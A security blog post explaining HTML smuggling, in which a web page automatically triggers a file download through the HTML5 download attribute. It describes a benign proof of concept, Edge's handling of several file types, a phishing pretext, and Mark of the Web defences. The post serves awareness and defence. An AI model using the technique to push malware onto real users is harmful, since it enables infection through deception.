Continuing on our previous article in the “What happens after the click?” series (see https://www.hivehack.tech/post/what-happens-after-the-click-part-1-fake-captcha), we came back with this article on HTML Smuggling. Have you ever visited a link and noticed that a download was triggered straight away? This is likely due to HTML smuggling (aka Drive-by download).

HTML Smuggling

Websites are often used for malware delivery, however, this typically involves the following steps:

1)      The victim visits the website

2)      The victim clicks “download”

3)      The victim executes the malware

Failure of any of these steps results in the failure of the attack. Thus, threat actors are motivated to reduce the complexity of their attacks to increase the chances of success. HTML smuggling is a technique that uses the HTML5 anchor tag download attribute to automatically trigger the download of a payload. Thus, the second step in the attack described above is skipped altogether.

We used the following proof of concept to trigger the download of test.txt containing “Hello world!”, however, the code can be easily modified for any type of file. The first highlighted string, the content of the file variable is “Hello world!” base64 encoded. An attacker could base64 any string (or binary for that matter). The second highlighted string is the fileName. In this case, it is test.txt, but it could be easily changed to test.exe, for instance, if we are trying to deliver an executable. 

Saving the payload with a .html extension and opening it with a browser automatically triggered the download of test.txt.

Exploring the extensions of the files and the behaviour of various browsers is key. In this case, we were using Microsoft Edge and it downloaded test.txt and test.exe straight away, however, test.dll was blocked, and required explicit approval from the user.

Limitations

At the end of the day, this attack by itself only delivers the payload to the victim, however, the victim must still execute it. But how many items are currently in your Downloads directory? Mine has 208. It is easy to execute something by mistake. Similarly, HTML smuggling would not be used by itself, instead, attackers would use social engineering to make the user execute the payload. A potential pretext could be “Your system is infected. Run the following executable to remove the malware”. Well, in this case, the downloaded executable will have the Mark of the Web (MOTW). MOTW is file metadata in Windows that marks a file that was obtained from an untrusted source. Certain applications have additional security measures for files from untrusted sources. For instance, Microsoft Office will open documents in Protected View and SmartScreen will raise a prompt before an executable is launched. So even if files are downloaded onto the system, pretexting is key.

Conclusion

In this article, we explored the impact of phishing beyond entering credentials in malicious websites impersonating legitimate ones. We looked at an attack vector whereby files are automatically downloaded onto the victim’s device when a link is visited. If you are not yet convinced of the impact of phishing attacks, stay tuned for our next article in this series where we will explore various browser attacks using The Browser Exploitation Framework (BeEF). Stay safe!